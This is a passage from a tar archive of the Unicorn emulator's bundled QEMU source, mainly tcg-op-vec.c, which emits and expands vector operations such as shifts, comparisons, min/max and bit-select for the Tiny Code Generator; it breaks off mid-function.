expand_cmp_vec(tcg_ctx, vece, dofs, aofs, bofs, oprsz, 16, TCG_TYPE_V128, cond); break; case TCG_TYPE_V64: expand_cmp_vec(tcg_ctx, vece, dofs, aofs, bofs, oprsz, 8, TCG_TYPE_V64, cond); break; case 0: if (vece == MO_64 && check_size_impl(oprsz, 8)) { expand_cmp_i64(tcg_ctx, dofs, aofs, bofs, oprsz, cond); } else if (vece == MO_32 && check_size_impl(oprsz, 4)) { expand_cmp_i32(tcg_ctx, dofs, aofs, bofs, oprsz, cond); } else { gen_helper_gvec_3 * const *fn = fns[cond]; if (fn == NULL) { uint32_t tmp; tmp = aofs, aofs = bofs, bofs = tmp; cond = tcg_swap_cond(cond); fn = fns[cond]; assert(fn != NULL); } tcg_gen_gvec_3_ool(tcg_ctx, dofs, aofs, bofs, oprsz, maxsz, 0, fn[vece]); oprsz = maxsz; } break; default: g_assert_not_reached(); } tcg_swap_vecop_list(hold_list); if (oprsz < maxsz) { expand_clr(tcg_ctx, dofs + oprsz, maxsz - oprsz); } } static void tcg_gen_bitsel_i64(TCGContext *tcg_ctx, TCGv_i64 d, TCGv_i64 a, TCGv_i64 b, TCGv_i64 c) { TCGv_i64 t = tcg_temp_new_i64(tcg_ctx); tcg_gen_and_i64(tcg_ctx, t, b, a); tcg_gen_andc_i64(tcg_ctx, d, c, a); tcg_gen_or_i64(tcg_ctx, d, d, t); tcg_temp_free_i64(tcg_ctx, t); } void tcg_gen_gvec_bitsel(TCGContext *tcg_ctx, unsigned vece, uint32_t dofs, uint32_t aofs, uint32_t bofs, uint32_t cofs, uint32_t oprsz, uint32_t maxsz) { static const GVecGen4 g = { .fni8 = tcg_gen_bitsel_i64, .fniv = tcg_gen_bitsel_vec, .fno = gen_helper_gvec_bitsel, }; tcg_gen_gvec_4(tcg_ctx, dofs, aofs, bofs, cofs, oprsz, maxsz, &g); } ��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/tcg/tcg-op-vec.c�����������������������������������������������������������������0000664�0000000�0000000�00000064076�14675241067�0017055�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * Tiny Code Generator for QEMU * * Copyright (c) 2018 Linaro, Inc. * * This library is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2.1 of the License, or (at your option) any later version. * * This library is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with this library; if not, see <http://www.gnu.org/licenses/>. */ #include "qemu/osdep.h" #include "cpu.h" #include "tcg/tcg.h" #include "tcg/tcg-op.h" #include "tcg/tcg-mo.h" /* Reduce the number of ifdefs below. This assumes that all uses of TCGV_HIGH and TCGV_LOW are properly protected by a conditional that the compiler can eliminate. */ #if TCG_TARGET_REG_BITS == 64 extern TCGv_i32 TCGV_LOW_link_error(TCGv_i64); extern TCGv_i32 TCGV_HIGH_link_error(TCGv_i64); #define TCGV_LOW TCGV_LOW_link_error #define TCGV_HIGH TCGV_HIGH_link_error #endif /* * Vector optional opcode tracking. * Except for the basic logical operations (and, or, xor), and * data movement (mov, ld, st, dupi), many vector opcodes are * optional and may not be supported on the host. Thank Intel * for the irregularity in their instruction set. * * The gvec expanders allow custom vector operations to be composed, * generally via the .fniv callback in the GVecGen* structures. At * the same time, in deciding whether to use this hook we need to * know if the host supports the required operations. This is * presented as an array of opcodes, terminated by 0. Each opcode * is assumed to be expanded with the given VECE. * * For debugging, we want to validate this array. Therefore, when * tcg_ctx->vec_opt_opc is non-NULL, the tcg_gen_*_vec expanders * will validate that their opcode is present in the list. */ #ifdef CONFIG_DEBUG_TCG void tcg_assert_listed_vecop(TCGOpcode op) { const TCGOpcode *p = tcg_ctx->vecop_list; if (p) { for (; *p; ++p) { if (*p == op) { return; } } g_assert_not_reached(); } } #endif bool tcg_can_emit_vecop_list(TCGContext *tcg_ctx, const TCGOpcode *list, TCGType type, unsigned vece) { if (list == NULL) { return true; } for (; *list; ++list) { TCGOpcode opc = *list; #ifdef CONFIG_DEBUG_TCG switch (opc) { case INDEX_op_and_vec: case INDEX_op_or_vec: case INDEX_op_xor_vec: case INDEX_op_mov_vec: case INDEX_op_dup_vec: case INDEX_op_dupi_vec: case INDEX_op_dup2_vec: case INDEX_op_ld_vec: case INDEX_op_st_vec: case INDEX_op_bitsel_vec: /* These opcodes are mandatory and should not be listed. */ g_assert_not_reached(); case INDEX_op_not_vec: /* These opcodes have generic expansions using the above. */ g_assert_not_reached(); default: break; } #endif if (tcg_can_emit_vec_op(tcg_ctx, opc, type, vece)) { continue; } /* * The opcode list is created by front ends based on what they * actually invoke. We must mirror the logic in the routines * below for generic expansions using other opcodes. */ switch (opc) { case INDEX_op_neg_vec: if (tcg_can_emit_vec_op(tcg_ctx, INDEX_op_sub_vec, type, vece)) { continue; } break; case INDEX_op_abs_vec: if (tcg_can_emit_vec_op(tcg_ctx, INDEX_op_sub_vec, type, vece) && (tcg_can_emit_vec_op(tcg_ctx, INDEX_op_smax_vec, type, vece) > 0 || tcg_can_emit_vec_op(tcg_ctx, INDEX_op_sari_vec, type, vece) > 0 || tcg_can_emit_vec_op(tcg_ctx, INDEX_op_cmp_vec, type, vece))) { continue; } break; case INDEX_op_cmpsel_vec: case INDEX_op_smin_vec: case INDEX_op_smax_vec: case INDEX_op_umin_vec: case INDEX_op_umax_vec: if (tcg_can_emit_vec_op(tcg_ctx, INDEX_op_cmp_vec, type, vece)) { continue; } break; default: break; } return false; } return true; } void vec_gen_2(TCGContext *tcg_ctx, TCGOpcode opc, TCGType type, unsigned vece, TCGArg r, TCGArg a) { TCGOp *op = tcg_emit_op(tcg_ctx, opc); TCGOP_VECL(op) = type - TCG_TYPE_V64; TCGOP_VECE(op) = vece; op->args[0] = r; op->args[1] = a; } void vec_gen_3(TCGContext *tcg_ctx, TCGOpcode opc, TCGType type, unsigned vece, TCGArg r, TCGArg a, TCGArg b) { TCGOp *op = tcg_emit_op(tcg_ctx, opc); TCGOP_VECL(op) = type - TCG_TYPE_V64; TCGOP_VECE(op) = vece; op->args[0] = r; op->args[1] = a; op->args[2] = b; } void vec_gen_4(TCGContext *tcg_ctx, TCGOpcode opc, TCGType type, unsigned vece, TCGArg r, TCGArg a, TCGArg b, TCGArg c) { TCGOp *op = tcg_emit_op(tcg_ctx, opc); TCGOP_VECL(op) = type - TCG_TYPE_V64; TCGOP_VECE(op) = vece; op->args[0] = r; op->args[1] = a; op->args[2] = b; op->args[3] = c; } static void vec_gen_6(TCGContext *tcg_ctx, TCGOpcode opc, TCGType type, unsigned vece, TCGArg r, TCGArg a, TCGArg b, TCGArg c, TCGArg d, TCGArg e) { TCGOp *op = tcg_emit_op(tcg_ctx, opc); TCGOP_VECL(op) = type - TCG_TYPE_V64; TCGOP_VECE(op) = vece; op->args[0] = r; op->args[1] = a; op->args[2] = b; op->args[3] = c; op->args[4] = d; op->args[5] = e; } static void vec_gen_op2(TCGContext *tcg_ctx, TCGOpcode opc, unsigned vece, TCGv_vec r, TCGv_vec a) { TCGTemp *rt = tcgv_vec_temp(tcg_ctx, r); TCGTemp *at = tcgv_vec_temp(tcg_ctx, a); TCGType type = rt->base_type; /* Must enough inputs for the output. */ tcg_debug_assert(at->base_type >= type); vec_gen_2(tcg_ctx, opc, type, vece, temp_arg(rt), temp_arg(at)); } static void vec_gen_op3(TCGContext *tcg_ctx, TCGOpcode opc, unsigned vece, TCGv_vec r, TCGv_vec a, TCGv_vec b) { TCGTemp *rt = tcgv_vec_temp(tcg_ctx, r); TCGTemp *at = tcgv_vec_temp(tcg_ctx, a); TCGTemp *bt = tcgv_vec_temp(tcg_ctx, b); TCGType type = rt->base_type; /* Must enough inputs for the output. */ tcg_debug_assert(at->base_type >= type); tcg_debug_assert(bt->base_type >= type); vec_gen_3(tcg_ctx, opc, type, vece, temp_arg(rt), temp_arg(at), temp_arg(bt)); } void tcg_gen_mov_vec(TCGContext *tcg_ctx, TCGv_vec r, TCGv_vec a) { if (r != a) { vec_gen_op2(tcg_ctx, INDEX_op_mov_vec, 0, r, a); } } #define MO_REG (TCG_TARGET_REG_BITS == 64 ? MO_64 : MO_32) static void do_dupi_vec(TCGContext *tcg_ctx, TCGv_vec r, unsigned vece, TCGArg a) { TCGTemp *rt = tcgv_vec_temp(tcg_ctx, r); vec_gen_2(tcg_ctx, INDEX_op_dupi_vec, rt->base_type, vece, temp_arg(rt), a); } TCGv_vec tcg_const_zeros_vec(TCGContext *tcg_ctx, TCGType type) { TCGv_vec ret = tcg_temp_new_vec(tcg_ctx, type); do_dupi_vec(tcg_ctx, ret, MO_REG, 0); return ret; } TCGv_vec tcg_const_ones_vec(TCGContext *tcg_ctx, TCGType type) { TCGv_vec ret = tcg_temp_new_vec(tcg_ctx, type); do_dupi_vec(tcg_ctx, ret, MO_REG, -1); return ret; } TCGv_vec tcg_const_zeros_vec_matching(TCGContext *tcg_ctx, TCGv_vec m) { TCGTemp *t = tcgv_vec_temp(tcg_ctx, m); return tcg_const_zeros_vec(tcg_ctx, t->base_type); } TCGv_vec tcg_const_ones_vec_matching(TCGContext *tcg_ctx, TCGv_vec m) { TCGTemp *t = tcgv_vec_temp(tcg_ctx, m); return tcg_const_ones_vec(tcg_ctx, t->base_type); } void tcg_gen_dup64i_vec(TCGContext *tcg_ctx, TCGv_vec r, uint64_t a) { if (TCG_TARGET_REG_BITS == 32 && a == deposit64(a, 32, 32, a)) { do_dupi_vec(tcg_ctx, r, MO_32, a); } else if (TCG_TARGET_REG_BITS == 64 || a == (uint64_t)(int32_t)a) { do_dupi_vec(tcg_ctx, r, MO_64, a); } else { TCGv_i64 c = tcg_const_i64(tcg_ctx, a); tcg_gen_dup_i64_vec(tcg_ctx, MO_64, r, c); tcg_temp_free_i64(tcg_ctx, c); } } void tcg_gen_dup32i_vec(TCGContext *tcg_ctx, TCGv_vec r, uint32_t a) { do_dupi_vec(tcg_ctx, r, MO_REG, dup_const(MO_32, a)); } void tcg_gen_dup16i_vec(TCGContext *tcg_ctx, TCGv_vec r, uint32_t a) { do_dupi_vec(tcg_ctx, r, MO_REG, dup_const(MO_16, a)); } void tcg_gen_dup8i_vec(TCGContext *tcg_ctx, TCGv_vec r, uint32_t a) { do_dupi_vec(tcg_ctx, r, MO_REG, dup_const(MO_8, a)); } void tcg_gen_dupi_vec(TCGContext *tcg_ctx, unsigned vece, TCGv_vec r, uint64_t a) { do_dupi_vec(tcg_ctx, r, MO_REG, dup_const(vece, a)); } void tcg_gen_dup_i64_vec(TCGContext *tcg_ctx, unsigned vece, TCGv_vec r, TCGv_i64 a) { TCGArg ri = tcgv_vec_arg(tcg_ctx, r); TCGTemp *rt = arg_temp(ri); TCGType type = rt->base_type; #if TCG_TARGET_REG_BITS == 64 TCGArg ai = tcgv_i64_arg(tcg_ctx, a); vec_gen_2(tcg_ctx, INDEX_op_dup_vec, type, vece, ri, ai); #else if (vece == MO_64) { TCGArg al = tcgv_i32_arg(tcg_ctx, TCGV_LOW(tcg_ctx, a)); TCGArg ah = tcgv_i32_arg(tcg_ctx, TCGV_HIGH(tcg_ctx, a)); vec_gen_3(tcg_ctx, INDEX_op_dup2_vec, type, MO_64, ri, al, ah); } else { TCGArg ai = tcgv_i32_arg(tcg_ctx, TCGV_LOW(tcg_ctx, a)); vec_gen_2(tcg_ctx, INDEX_op_dup_vec, type, vece, ri, ai); } #endif } void tcg_gen_dup_i32_vec(TCGContext *tcg_ctx, unsigned vece, TCGv_vec r, TCGv_i32 a) { TCGArg ri = tcgv_vec_arg(tcg_ctx, r); TCGArg ai = tcgv_i32_arg(tcg_ctx, a); TCGTemp *rt = arg_temp(ri); TCGType type = rt->base_type; vec_gen_2(tcg_ctx, INDEX_op_dup_vec, type, vece, ri, ai); } void tcg_gen_dup_mem_vec(TCGContext *tcg_ctx, unsigned vece, TCGv_vec r, TCGv_ptr b, tcg_target_long ofs) { TCGArg ri = tcgv_vec_arg(tcg_ctx, r); TCGArg bi = tcgv_ptr_arg(tcg_ctx, b); TCGTemp *rt = arg_temp(ri); TCGType type = rt->base_type; vec_gen_3(tcg_ctx, INDEX_op_dupm_vec, type, vece, ri, bi, ofs); } static void vec_gen_ldst(TCGContext *tcg_ctx, TCGOpcode opc, TCGv_vec r, TCGv_ptr b, TCGArg o) { TCGArg ri = tcgv_vec_arg(tcg_ctx, r); TCGArg bi = tcgv_ptr_arg(tcg_ctx, b); TCGTemp *rt = arg_temp(ri); TCGType type = rt->base_type; vec_gen_3(tcg_ctx, opc, type, 0, ri, bi, o); } void tcg_gen_ld_vec(TCGContext *tcg_ctx, TCGv_vec r, TCGv_ptr b, TCGArg o) { vec_gen_ldst(tcg_ctx, INDEX_op_ld_vec, r, b, o); } void tcg_gen_st_vec(TCGContext *tcg_ctx, TCGv_vec r, TCGv_ptr b, TCGArg o) { vec_gen_ldst(tcg_ctx, INDEX_op_st_vec, r, b, o); } void tcg_gen_stl_vec(TCGContext *tcg_ctx, TCGv_vec r, TCGv_ptr b, TCGArg o, TCGType low_type) { TCGArg ri = tcgv_vec_arg(tcg_ctx, r); TCGArg bi = tcgv_ptr_arg(tcg_ctx, b); TCGTemp *rt = arg_temp(ri); TCGType type = rt->base_type; tcg_debug_assert(low_type >= TCG_TYPE_V64); tcg_debug_assert(low_type <= type); vec_gen_3(tcg_ctx, INDEX_op_st_vec, low_type, 0, ri, bi, o); } void tcg_gen_and_vec(TCGContext *tcg_ctx, unsigned vece, TCGv_vec r, TCGv_vec a, TCGv_vec b) { vec_gen_op3(tcg_ctx, INDEX_op_and_vec, 0, r, a, b); } void tcg_gen_or_vec(TCGContext *tcg_ctx, unsigned vece, TCGv_vec r, TCGv_vec a, TCGv_vec b) { vec_gen_op3(tcg_ctx, INDEX_op_or_vec, 0, r, a, b); } void tcg_gen_xor_vec(TCGContext *tcg_ctx, unsigned vece, TCGv_vec r, TCGv_vec a, TCGv_vec b) { vec_gen_op3(tcg_ctx, INDEX_op_xor_vec, 0, r, a, b); } void tcg_gen_andc_vec(TCGContext *tcg_ctx, unsigned vece, TCGv_vec r, TCGv_vec a, TCGv_vec b) { if (TCG_TARGET_HAS_andc_vec) { vec_gen_op3(tcg_ctx, INDEX_op_andc_vec, 0, r, a, b); } else { TCGv_vec t = tcg_temp_new_vec_matching(tcg_ctx, r); tcg_gen_not_vec(tcg_ctx, 0, t, b); tcg_gen_and_vec(tcg_ctx, 0, r, a, t); tcg_temp_free_vec(tcg_ctx, t); } } void tcg_gen_orc_vec(TCGContext *tcg_ctx, unsigned vece, TCGv_vec r, TCGv_vec a, TCGv_vec b) { if (TCG_TARGET_HAS_orc_vec) { vec_gen_op3(tcg_ctx, INDEX_op_orc_vec, 0, r, a, b); } else { TCGv_vec t = tcg_temp_new_vec_matching(tcg_ctx, r); tcg_gen_not_vec(tcg_ctx, 0, t, b); tcg_gen_or_vec(tcg_ctx, 0, r, a, t); tcg_temp_free_vec(tcg_ctx, t); } } void tcg_gen_nand_vec(TCGContext *tcg_ctx, unsigned vece, TCGv_vec r, TCGv_vec a, TCGv_vec b) { /* TODO: Add TCG_TARGET_HAS_nand_vec when adding a backend supports it. */ tcg_gen_and_vec(tcg_ctx, 0, r, a, b); tcg_gen_not_vec(tcg_ctx, 0, r, r); } void tcg_gen_nor_vec(TCGContext *tcg_ctx, unsigned vece, TCGv_vec r, TCGv_vec a, TCGv_vec b) { /* TODO: Add TCG_TARGET_HAS_nor_vec when adding a backend supports it. */ tcg_gen_or_vec(tcg_ctx, 0, r, a, b); tcg_gen_not_vec(tcg_ctx, 0, r, r); } void tcg_gen_eqv_vec(TCGContext *tcg_ctx, unsigned vece, TCGv_vec r, TCGv_vec a, TCGv_vec b) { /* TODO: Add TCG_TARGET_HAS_eqv_vec when adding a backend supports it. */ tcg_gen_xor_vec(tcg_ctx, 0, r, a, b); tcg_gen_not_vec(tcg_ctx, 0, r, r); } static bool do_op2(TCGContext *tcg_ctx, unsigned vece, TCGv_vec r, TCGv_vec a, TCGOpcode opc) { TCGTemp *rt = tcgv_vec_temp(tcg_ctx, r); TCGTemp *at = tcgv_vec_temp(tcg_ctx, a); TCGArg ri = temp_arg(rt); TCGArg ai = temp_arg(at); TCGType type = rt->base_type; int can; tcg_debug_assert(at->base_type >= type); tcg_assert_listed_vecop(opc); can = tcg_can_emit_vec_op(tcg_ctx, opc, type, vece); if (can > 0) { vec_gen_2(tcg_ctx, opc, type, vece, ri, ai); } else if (can < 0) { const TCGOpcode *hold_list = tcg_swap_vecop_list(NULL); tcg_expand_vec_op(tcg_ctx, opc, type, vece, ri, ai); tcg_swap_vecop_list(hold_list); } else { return false; } return true; } void tcg_gen_not_vec(TCGContext *tcg_ctx, unsigned vece, TCGv_vec r, TCGv_vec a) { const TCGOpcode *hold_list = tcg_swap_vecop_list(NULL); if (!TCG_TARGET_HAS_not_vec || !do_op2(tcg_ctx, vece, r, a, INDEX_op_not_vec)) { TCGv_vec t = tcg_const_ones_vec_matching(tcg_ctx, r); tcg_gen_xor_vec(tcg_ctx, 0, r, a, t); tcg_temp_free_vec(tcg_ctx, t); } tcg_swap_vecop_list(hold_list); } void tcg_gen_neg_vec(TCGContext *tcg_ctx, unsigned vece, TCGv_vec r, TCGv_vec a) { const TCGOpcode *hold_list; tcg_assert_listed_vecop(INDEX_op_neg_vec); hold_list = tcg_swap_vecop_list(NULL); if (!TCG_TARGET_HAS_neg_vec || !do_op2(tcg_ctx, vece, r, a, INDEX_op_neg_vec)) { TCGv_vec t = tcg_const_zeros_vec_matching(tcg_ctx, r); tcg_gen_sub_vec(tcg_ctx, vece, r, t, a); tcg_temp_free_vec(tcg_ctx, t); } tcg_swap_vecop_list(hold_list); } void tcg_gen_abs_vec(TCGContext *tcg_ctx, unsigned vece, TCGv_vec r, TCGv_vec a) { const TCGOpcode *hold_list; tcg_assert_listed_vecop(INDEX_op_abs_vec); hold_list = tcg_swap_vecop_list(NULL); if (!do_op2(tcg_ctx, vece, r, a, INDEX_op_abs_vec)) { TCGType type = tcgv_vec_temp(tcg_ctx, r)->base_type; TCGv_vec t = tcg_temp_new_vec(tcg_ctx, type); tcg_debug_assert(tcg_can_emit_vec_op(tcg_ctx, INDEX_op_sub_vec, type, vece)); if (tcg_can_emit_vec_op(tcg_ctx, INDEX_op_smax_vec, type, vece) > 0) { tcg_gen_neg_vec(tcg_ctx, vece, t, a); tcg_gen_smax_vec(tcg_ctx, vece, r, a, t); } else { if (tcg_can_emit_vec_op(tcg_ctx, INDEX_op_sari_vec, type, vece) > 0) { tcg_gen_sari_vec(tcg_ctx, vece, t, a, (8 << vece) - 1); } else { do_dupi_vec(tcg_ctx, t, MO_REG, 0); tcg_gen_cmp_vec(tcg_ctx, TCG_COND_LT, vece, t, a, t); } tcg_gen_xor_vec(tcg_ctx, vece, r, a, t); tcg_gen_sub_vec(tcg_ctx, vece, r, r, t); } tcg_temp_free_vec(tcg_ctx, t); } tcg_swap_vecop_list(hold_list); } static void do_shifti(TCGContext *tcg_ctx, TCGOpcode opc, unsigned vece, TCGv_vec r, TCGv_vec a, int64_t i) { TCGTemp *rt = tcgv_vec_temp(tcg_ctx, r); TCGTemp *at = tcgv_vec_temp(tcg_ctx, a); TCGArg ri = temp_arg(rt); TCGArg ai = temp_arg(at); TCGType type = rt->base_type; int can; tcg_debug_assert(at->base_type == type); tcg_debug_assert(i >= 0 && i < (8 << vece)); tcg_assert_listed_vecop(opc); if (i == 0) { tcg_gen_mov_vec(tcg_ctx, r, a); return; } can = tcg_can_emit_vec_op(tcg_ctx, opc, type, vece); if (can > 0) { vec_gen_3(tcg_ctx, opc, type, vece, ri, ai, i); } else { /* We leave the choice of expansion via scalar or vector shift to the target. Often, but not always, dupi can feed a vector shift easier than a scalar. */ const TCGOpcode *hold_list = tcg_swap_vecop_list(NULL); tcg_debug_assert(can < 0); tcg_expand_vec_op(tcg_ctx, opc, type, vece, ri, ai, i); tcg_swap_vecop_list(hold_list); } } void tcg_gen_shli_vec(TCGContext *tcg_ctx, unsigned vece, TCGv_vec r, TCGv_vec a, int64_t i) { do_shifti(tcg_ctx, INDEX_op_shli_vec, vece, r, a, i); } void tcg_gen_shri_vec(TCGContext *tcg_ctx, unsigned vece, TCGv_vec r, TCGv_vec a, int64_t i) { do_shifti(tcg_ctx, INDEX_op_shri_vec, vece, r, a, i); } void tcg_gen_sari_vec(TCGContext *tcg_ctx, unsigned vece, TCGv_vec r, TCGv_vec a, int64_t i) { do_shifti(tcg_ctx, INDEX_op_sari_vec, vece, r, a, i); } void tcg_gen_cmp_vec(TCGContext *tcg_ctx, TCGCond cond, unsigned vece, TCGv_vec r, TCGv_vec a, TCGv_vec b) { TCGTemp *rt = tcgv_vec_temp(tcg_ctx, r); TCGTemp *at = tcgv_vec_temp(tcg_ctx, a); TCGTemp *bt = tcgv_vec_temp(tcg_ctx, b); TCGArg ri = temp_arg(rt); TCGArg ai = temp_arg(at); TCGArg bi = temp_arg(bt); TCGType type = rt->base_type; int can; tcg_debug_assert(at->base_type >= type); tcg_debug_assert(bt->base_type >= type); tcg_assert_listed_vecop(INDEX_op_cmp_vec); can = tcg_can_emit_vec_op(tcg_ctx, INDEX_op_cmp_vec, type, vece); if (can > 0) { vec_gen_4(tcg_ctx, INDEX_op_cmp_vec, type, vece, ri, ai, bi, cond); } else { const TCGOpcode *hold_list = tcg_swap_vecop_list(NULL); tcg_debug_assert(can < 0); tcg_expand_vec_op(tcg_ctx, INDEX_op_cmp_vec, type, vece, ri, ai, bi, cond); tcg_swap_vecop_list(hold_list); } } static bool do_op3(TCGContext *tcg_ctx, unsigned vece, TCGv_vec r, TCGv_vec a, TCGv_vec b, TCGOpcode opc) { TCGTemp *rt = tcgv_vec_temp(tcg_ctx, r); TCGTemp *at = tcgv_vec_temp(tcg_ctx, a); TCGTemp *bt = tcgv_vec_temp(tcg_ctx, b); TCGArg ri = temp_arg(rt); TCGArg ai = temp_arg(at); TCGArg bi = temp_arg(bt); TCGType type = rt->base_type; int can; tcg_debug_assert(at->base_type >= type); tcg_debug_assert(bt->base_type >= type); tcg_assert_listed_vecop(opc); can = tcg_can_emit_vec_op(tcg_ctx, opc, type, vece); if (can > 0) { vec_gen_3(tcg_ctx, opc, type, vece, ri, ai, bi); } else if (can < 0) { const TCGOpcode *hold_list = tcg_swap_vecop_list(NULL); tcg_expand_vec_op(tcg_ctx, opc, type, vece, ri, ai, bi); tcg_swap_vecop_list(hold_list); } else { return false; } return true; } static void do_op3_nofail(TCGContext *tcg_ctx, unsigned vece, TCGv_vec r, TCGv_vec a, TCGv_vec b, TCGOpcode opc) { bool ok = do_op3(tcg_ctx, vece, r, a, b, opc); tcg_debug_assert(ok); } void tcg_gen_add_vec(TCGContext *tcg_ctx, unsigned vece, TCGv_vec r, TCGv_vec a, TCGv_vec b) { do_op3_nofail(tcg_ctx, vece, r, a, b, INDEX_op_add_vec); } void tcg_gen_sub_vec(TCGContext *tcg_ctx, unsigned vece, TCGv_vec r, TCGv_vec a, TCGv_vec b) { do_op3_nofail(tcg_ctx, vece, r, a, b, INDEX_op_sub_vec); } void tcg_gen_mul_vec(TCGContext *tcg_ctx, unsigned vece, TCGv_vec r, TCGv_vec a, TCGv_vec b) { do_op3_nofail(tcg_ctx, vece, r, a, b, INDEX_op_mul_vec); } void tcg_gen_ssadd_vec(TCGContext *tcg_ctx, unsigned vece, TCGv_vec r, TCGv_vec a, TCGv_vec b) { do_op3_nofail(tcg_ctx, vece, r, a, b, INDEX_op_ssadd_vec); } void tcg_gen_usadd_vec(TCGContext *tcg_ctx, unsigned vece, TCGv_vec r, TCGv_vec a, TCGv_vec b) { do_op3_nofail(tcg_ctx, vece, r, a, b, INDEX_op_usadd_vec); } void tcg_gen_sssub_vec(TCGContext *tcg_ctx, unsigned vece, TCGv_vec r, TCGv_vec a, TCGv_vec b) { do_op3_nofail(tcg_ctx, vece, r, a, b, INDEX_op_sssub_vec); } void tcg_gen_ussub_vec(TCGContext *tcg_ctx, unsigned vece, TCGv_vec r, TCGv_vec a, TCGv_vec b) { do_op3_nofail(tcg_ctx, vece, r, a, b, INDEX_op_ussub_vec); } static void do_minmax(TCGContext *tcg_ctx, unsigned vece, TCGv_vec r, TCGv_vec a, TCGv_vec b, TCGOpcode opc, TCGCond cond) { if (!do_op3(tcg_ctx, vece, r, a, b, opc)) { tcg_gen_cmpsel_vec(tcg_ctx, cond, vece, r, a, b, a, b); } } void tcg_gen_smin_vec(TCGContext *tcg_ctx, unsigned vece, TCGv_vec r, TCGv_vec a, TCGv_vec b) { do_minmax(tcg_ctx, vece, r, a, b, INDEX_op_smin_vec, TCG_COND_LT); } void tcg_gen_umin_vec(TCGContext *tcg_ctx, unsigned vece, TCGv_vec r, TCGv_vec a, TCGv_vec b) { do_minmax(tcg_ctx, vece, r, a, b, INDEX_op_umin_vec, TCG_COND_LTU); } void tcg_gen_smax_vec(TCGContext *tcg_ctx, unsigned vece, TCGv_vec r, TCGv_vec a, TCGv_vec b) { do_minmax(tcg_ctx, vece, r, a, b, INDEX_op_smax_vec, TCG_COND_GT); } void tcg_gen_umax_vec(TCGContext *tcg_ctx, unsigned vece, TCGv_vec r, TCGv_vec a, TCGv_vec b) { do_minmax(tcg_ctx, vece, r, a, b, INDEX_op_umax_vec, TCG_COND_GTU); } void tcg_gen_shlv_vec(TCGContext *tcg_ctx, unsigned vece, TCGv_vec r, TCGv_vec a, TCGv_vec b) { do_op3_nofail(tcg_ctx, vece, r, a, b, INDEX_op_shlv_vec); } void tcg_gen_shrv_vec(TCGContext *tcg_ctx, unsigned vece, TCGv_vec r, TCGv_vec a, TCGv_vec b) { do_op3_nofail(tcg_ctx, vece, r, a, b, INDEX_op_shrv_vec); } void tcg_gen_sarv_vec(TCGContext *tcg_ctx, unsigned vece, TCGv_vec r, TCGv_vec a, TCGv_vec b) { do_op3_nofail(tcg_ctx, vece, r, a, b, INDEX_op_sarv_vec); } static void do_shifts(TCGContext *tcg_ctx, unsigned vece, TCGv_vec r, TCGv_vec a, TCGv_i32 s, TCGOpcode opc_s, TCGOpcode opc_v) { TCGTemp *rt = tcgv_vec_temp(tcg_ctx, r); TCGTemp *at = tcgv_vec_temp(tcg_ctx, a); TCGTemp *st = tcgv_i32_temp(tcg_ctx, s); TCGArg ri = temp_arg(rt); TCGArg ai = temp_arg(at); TCGArg si = temp_arg(st); TCGType type = rt->base_type; const TCGOpcode *hold_list; int can; tcg_debug_assert(at->base_type >= type); tcg_assert_listed_vecop(opc_s); hold_list = tcg_swap_vecop_list(NULL); can = tcg_can_emit_vec_op(tcg_ctx, opc_s, type, vece); if (can > 0) { vec_gen_3(tcg_ctx, opc_s, type, vece, ri, ai, si); } else if (can < 0) { tcg_expand_vec_op(tcg_ctx, opc_s, type, vece, ri, ai, si); } else { TCGv_vec vec_s = tcg_temp_new_vec(tcg_ctx, type); if (vece == MO_64) { TCGv_i64 s64 = tcg_temp_new_i64(tcg_ctx); tcg_gen_extu_i32_i64(tcg_ctx, s64, s); tcg_gen_dup_i64_vec(tcg_ctx, MO_64, vec_s, s64); tcg_temp_free_i64(tcg_ctx, s64); } else { tcg_gen_dup_i32_vec(tcg_ctx, vece, vec_s, s); } do_op3_nofail(tcg_ctx, vece, r, a, vec_s, opc_v); tcg_temp_free_vec(tcg_ctx, vec_s); } tcg_swap_vecop_list(hold_list); } void tcg_gen_shls_vec(TCGContext *tcg_ctx, unsigned vece, TCGv_vec r, TCGv_vec a, TCGv_i32 b) { do_shifts(tcg_ctx, vece, r, a, b, INDEX_op_shls_vec, INDEX_op_shlv_vec); } void tcg_gen_shrs_vec(TCGContext *tcg_ctx, unsigned vece, TCGv_vec r, TCGv_vec a, TCGv_i32 b) { do_shifts(tcg_ctx, vece, r, a, b, INDEX_op_shrs_vec, INDEX_op_shrv_vec); } void tcg_gen_sars_vec(TCGContext *tcg_ctx, unsigned vece, TCGv_vec r, TCGv_vec a, TCGv_i32 b) { do_shifts(tcg_ctx, vece, r, a, b, INDEX_op_sars_vec, INDEX_op_sarv_vec); } void tcg_gen_bitsel_vec(TCGContext *tcg_ctx, unsigned vece, TCGv_vec r, TCGv_vec a, TCGv_vec b, TCGv_vec c) { TCGTemp *rt = tcgv_vec_temp(tcg_ctx, r); TCGTemp *at = tcgv_vec_temp(tcg_ctx, a); TCGTemp *bt = tcgv_vec_temp(tcg_ctx, b); TCGTemp *ct = tcgv_vec_temp(tcg_ctx, c); TCGType type = rt->base_type; tcg_debug_assert(at->base_type >= type); tcg_debug_assert(bt->base_type >= type); tcg_debug_assert(ct->base_type >= type); if (TCG_TARGET_HAS_bitsel_vec) { vec_gen_4(tcg_ctx, INDEX_op_bitsel_vec, type, MO_8, temp_arg(rt), temp_arg(at), temp_arg(bt), temp_arg(ct)); } else { TCGv_vec t = tcg_temp_new_vec(tcg_ctx, type); tcg_gen_and_vec(tcg_ctx, MO_8, t, a, b); tcg_gen_andc_vec(tcg_ctx, MO_8, r, c, a); tcg_gen_or_vec(tcg_ctx, MO_8, r, r, t); tcg_temp_free_vec(tcg_ctx, t); } } void tcg_gen_cmpsel_vec(TCGContext *tcg_ctx, TCGCond cond, unsigned vece, TCGv_vec r, TCGv_vec a, TCGv_vec b, TCGv_vec c, TCGv_vec d) { TCGTemp *rt = tcgv_vec_temp(tcg_ctx, r); TCGTemp *at = tcgv_vec_temp(tcg_ctx, a); TCGTemp *bt = 